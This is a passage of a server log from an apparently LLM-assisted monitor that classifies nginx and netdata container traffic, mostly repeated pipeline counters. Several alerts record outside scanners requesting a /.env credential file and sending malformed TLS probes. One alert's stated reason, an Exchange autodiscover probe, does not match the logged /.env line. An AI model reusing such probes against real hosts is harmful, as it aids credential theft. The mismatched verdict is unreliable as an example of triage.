llm_errors=0 learned=0 Mar 20 01:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:26:31.933595 [observer] Patterns: hash=440 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:27:01.978704 [observer] Pipeline: processed=447 pattern_hits=442 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:27:01.979705 [observer] Patterns: hash=442 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:27:31.934420 [observer] Pipeline: processed=451 pattern_hits=446 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:27:31.934450 [observer] Patterns: hash=446 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:28:01.946756 [observer] Pipeline: processed=453 pattern_hits=448 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:28:01.946784 [observer] Patterns: hash=448 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:28:31.934274 [observer] Pipeline: processed=457 pattern_hits=452 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:28:31.934300 [observer] Patterns: hash=452 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:29:01.944857 [observer] Pipeline: processed=461 pattern_hits=456 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:29:01.944914 [observer] Patterns: hash=456 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:29:31.933269 [observer] Pipeline: processed=464 
pattern_hits=459 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:29:31.933290 [observer] Patterns: hash=459 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:30:01.945396 [observer] Pipeline: processed=467 pattern_hits=462 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:30:01.945428 [observer] Patterns: hash=462 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:30:31.950330 [observer] Pipeline: processed=469 pattern_hits=464 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:30:31.950351 [observer] Patterns: hash=464 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:01.969695 [observer] Pipeline: processed=473 pattern_hits=468 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:01.973052 [observer] Patterns: hash=468 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:31.944644 [observer] Pipeline: processed=475 pattern_hits=470 llm_calls=5 llm_errors=0 learned=0 Mar 20 01:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:31.944674 [observer] Patterns: hash=470 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=5 Mar 20 01:31:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:53.887769 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type= Mar 20 01:31:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:53.887814 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file 
(.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T01:31:48.802441998Z 2026/03/20 01:31:48 [error] 422#422: *743443 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 154.29.232.95, server: _, request: "GE... Mar 20 01:31:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:31:53.887893 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T01:31:48.802456145Z 154.29.232.95 - - [20/Mar/2026:01:31:48 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik... Mar 20 01:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:32:01.951310 [observer] Pipeline: processed=480 pattern_hits=473 llm_calls=7 llm_errors=0 learned=0 Mar 20 01:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:32:01.951345 [observer] Patterns: hash=473 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=7 Mar 20 01:32:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:32:03.422243 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type= Mar 20 01:32:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:32:03.422279 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T01:31:49.291748684Z 154.29.232.95 - - [20/Mar/2026:01:31:49 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Ge... 
Mar 20 01:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:32:31.943243 [observer] Pipeline: processed=484 pattern_hits=477 llm_calls=7 llm_errors=0 learned=0 Mar 20 01:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:32:31.943267 [observer] Patterns: hash=477 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=7 Mar 20 01:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:33:01.941540 [observer] Pipeline: processed=487 pattern_hits=480 llm_calls=7 llm_errors=0 learned=0 Mar 20 01:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:33:01.941566 [observer] Patterns: hash=480 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=7 Mar 20 01:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:33:31.934658 [observer] Pipeline: processed=490 pattern_hits=483 llm_calls=7 llm_errors=0 learned=0 Mar 20 01:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:33:31.934684 [observer] Patterns: hash=483 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=7 Mar 20 01:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:01.954494 [observer] Pipeline: processed=494 pattern_hits=487 llm_calls=7 llm_errors=0 learned=0 Mar 20 01:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:01.954525 [observer] Patterns: hash=487 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=7 Mar 20 01:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:31.934061 [observer] Pipeline: processed=498 pattern_hits=491 llm_calls=7 llm_errors=0 learned=0 Mar 20 01:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:31.934589 [observer] Patterns: hash=491 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=7 Mar 20 01:34:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:41.185922 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=regex Mar 20 01:34:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:41.185958 [analyzer] Source hint 
mismatch: LLM says "tc-qos-helper", actual is "captain-netdata-container" — skipping pattern Mar 20 01:34:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:46.793048 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 01:34:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:46.793080 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+) Mar 20 01:34:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:53.321333 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 01:34:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:53.321369 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 01:34:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:57.069931 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 20 01:34:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:57.069967 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T01:34:52.008107287Z 205.210.31.140 - - [20/Mar/2026:01:34:52 +0000] "_" "\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\xAE\x90\x1B\xEE\xE9\xDDN#\x11\xA3\x22\xA7\x86^i\x17\xB2\x08\x02Q\xD5y\x... Mar 20 01:34:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:34:57.070069 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. 
Line=2026-03-20T01:34:52.012072174Z 205.210.31.140 - - [20/Mar/2026:01:34:52 +0000] "_" "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03#\xCD\xF2\xB2cX\xE3\x88\xC5y\x8A\xFD\xC7vRY\xF7\xBB\xBB\xFE\xCE\x99\xB1#... Mar 20 01:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:35:01.945399 [observer] Pipeline: processed=505 pattern_hits=494 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:35:01.945431 [observer] Patterns: hash=494 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:35:31.933688 [observer] Pipeline: processed=509 pattern_hits=498 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:35:31.933712 [observer] Patterns: hash=498 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:36:01.943736 [observer] Pipeline: processed=511 pattern_hits=500 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:36:01.943761 [observer] Patterns: hash=500 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:36:31.935488 [observer] Pipeline: processed=514 pattern_hits=503 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:36:31.935522 [observer] Patterns: hash=503 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:37:01.950386 [observer] Pipeline: processed=517 pattern_hits=506 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:37:01.950436 [observer] Patterns: hash=506 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:37:31.951110 [observer] 
Pipeline: processed=519 pattern_hits=508 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:37:31.951134 [observer] Patterns: hash=508 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:38:01.967323 [observer] Pipeline: processed=523 pattern_hits=512 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:38:01.967351 [observer] Patterns: hash=512 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:38:31.941661 [observer] Pipeline: processed=525 pattern_hits=514 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:38:31.941685 [observer] Patterns: hash=514 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:39:01.959123 [observer] Pipeline: processed=531 pattern_hits=520 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:39:01.959151 [observer] Patterns: hash=520 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:39:31.944098 [observer] Pipeline: processed=533 pattern_hits=522 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:39:31.944124 [observer] Patterns: hash=522 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:40:01.940518 [observer] Pipeline: processed=536 pattern_hits=525 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:40:01.940573 [observer] Patterns: hash=525 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:40:31 ip-172-26-12-110 
observer[1565011]: 2026/03/20 01:40:31.933999 [observer] Pipeline: processed=539 pattern_hits=528 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:40:31.934023 [observer] Patterns: hash=528 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:41:01.979758 [observer] Pipeline: processed=541 pattern_hits=530 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:41:01.979790 [observer] Patterns: hash=530 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:41:31.933505 [observer] Pipeline: processed=545 pattern_hits=534 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:41:31.933529 [observer] Patterns: hash=534 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:42:01.951727 [observer] Pipeline: processed=547 pattern_hits=536 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:42:01.951757 [observer] Patterns: hash=536 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:42:31.935266 [observer] Pipeline: processed=552 pattern_hits=541 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:42:31.935289 [observer] Patterns: hash=541 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:43:01.946614 [observer] Pipeline: processed=554 pattern_hits=543 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:43:01.946643 [observer] Patterns: hash=543 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 
misses=11 Mar 20 01:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:43:31.933712 [observer] Pipeline: processed=557 pattern_hits=546 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:43:31.933738 [observer] Patterns: hash=546 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:44:01.965415 [observer] Pipeline: processed=562 pattern_hits=551 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:44:01.965448 [observer] Patterns: hash=551 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:44:31.948557 [observer] Pipeline: processed=564 pattern_hits=553 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:44:31.948583 [observer] Patterns: hash=553 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:45:01.957455 [observer] Pipeline: processed=568 pattern_hits=557 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:45:01.957485 [observer] Patterns: hash=557 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:45:31.938121 [observer] Pipeline: processed=570 pattern_hits=559 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:45:31.938149 [observer] Patterns: hash=559 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:46:01.970803 [observer] Pipeline: processed=574 pattern_hits=563 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:46:01.970834 [observer] Patterns: hash=563 prefix=0 
regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:46:31.943298 [observer] Pipeline: processed=576 pattern_hits=565 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:46:31.943325 [observer] Patterns: hash=565 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:47:01.971054 [observer] Pipeline: processed=578 pattern_hits=567 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:47:01.971087 [observer] Patterns: hash=567 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:47:31.934657 [observer] Pipeline: processed=582 pattern_hits=571 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:47:31.934699 [observer] Patterns: hash=571 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:48:01.970151 [observer] Pipeline: processed=584 pattern_hits=573 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:48:01.970915 [observer] Patterns: hash=573 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:48:31.939178 [observer] Pipeline: processed=588 pattern_hits=577 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:48:31.939209 [observer] Patterns: hash=577 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:49:01.982597 [observer] Pipeline: processed=590 pattern_hits=579 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 
01:49:01.982629 [observer] Patterns: hash=579 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:49:31.933658 [observer] Pipeline: processed=596 pattern_hits=585 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:49:31.933681 [observer] Patterns: hash=585 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:50:01.945042 [observer] Pipeline: processed=598 pattern_hits=587 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:50:01.945069 [observer] Patterns: hash=587 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:50:31.949837 [observer] Pipeline: processed=600 pattern_hits=589 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:50:31.949866 [observer] Patterns: hash=589 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:51:01.960014 [observer] Pipeline: processed=604 pattern_hits=593 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:51:01.960042 [observer] Patterns: hash=593 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:51:31.941559 [observer] Pipeline: processed=606 pattern_hits=595 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:51:31.941710 [observer] Patterns: hash=595 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:52:01.943961 [observer] Pipeline: processed=610 pattern_hits=599 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:52:01 
ip-172-26-12-110 observer[1565011]: 2026/03/20 01:52:01.943987 [observer] Patterns: hash=599 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:52:31.934423 [observer] Pipeline: processed=612 pattern_hits=601 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:52:31.934447 [observer] Patterns: hash=601 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:53:01.942811 [observer] Pipeline: processed=616 pattern_hits=605 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:53:01.942835 [observer] Patterns: hash=605 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:53:31.934429 [observer] Pipeline: processed=618 pattern_hits=607 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:53:31.934455 [observer] Patterns: hash=607 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:54:01.950651 [observer] Pipeline: processed=620 pattern_hits=609 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:54:01.950681 [observer] Patterns: hash=609 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:54:31.934469 [observer] Pipeline: processed=626 pattern_hits=615 llm_calls=11 llm_errors=0 learned=0 Mar 20 01:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:54:31.934493 [observer] Patterns: hash=615 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11 Mar 20 01:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:55:01.973607 [observer] Pipeline: processed=628 pattern_hits=617 
llm_calls=11 llm_errors=0 learned=0
Mar 20 01:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:55:01.973640 [observer] Patterns: hash=617 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:55:31.938457 [observer] Pipeline: processed=632 pattern_hits=621 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:55:31.938483 [observer] Patterns: hash=621 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:56:01.961070 [observer] Pipeline: processed=634 pattern_hits=623 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:56:01.961097 [observer] Patterns: hash=623 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:56:31.934607 [observer] Pipeline: processed=638 pattern_hits=627 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:56:31.934647 [observer] Patterns: hash=627 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:57:01.953782 [observer] Pipeline: processed=640 pattern_hits=629 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:57:01.954533 [observer] Patterns: hash=629 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:57:31.933651 [observer] Pipeline: processed=642 pattern_hits=631 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:57:31.933677 [observer] Patterns: hash=631 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:58:01.950759 [observer] Pipeline: processed=646 pattern_hits=635 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:58:01.950783 [observer] Patterns: hash=635 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:58:31.949255 [observer] Pipeline: processed=648 pattern_hits=637 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:58:31.949279 [observer] Patterns: hash=637 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
Mar 20 01:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:59:01.963912 [observer] Pipeline: processed=652 pattern_hits=641 llm_calls=11 llm_errors=0 learned=0
Mar 20 01:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 01:59:01.963943 [observer] Patterns: hash=641 prefix=0 regex=0 contains=0 deny=1 alert=1 suppress=0 misses=11
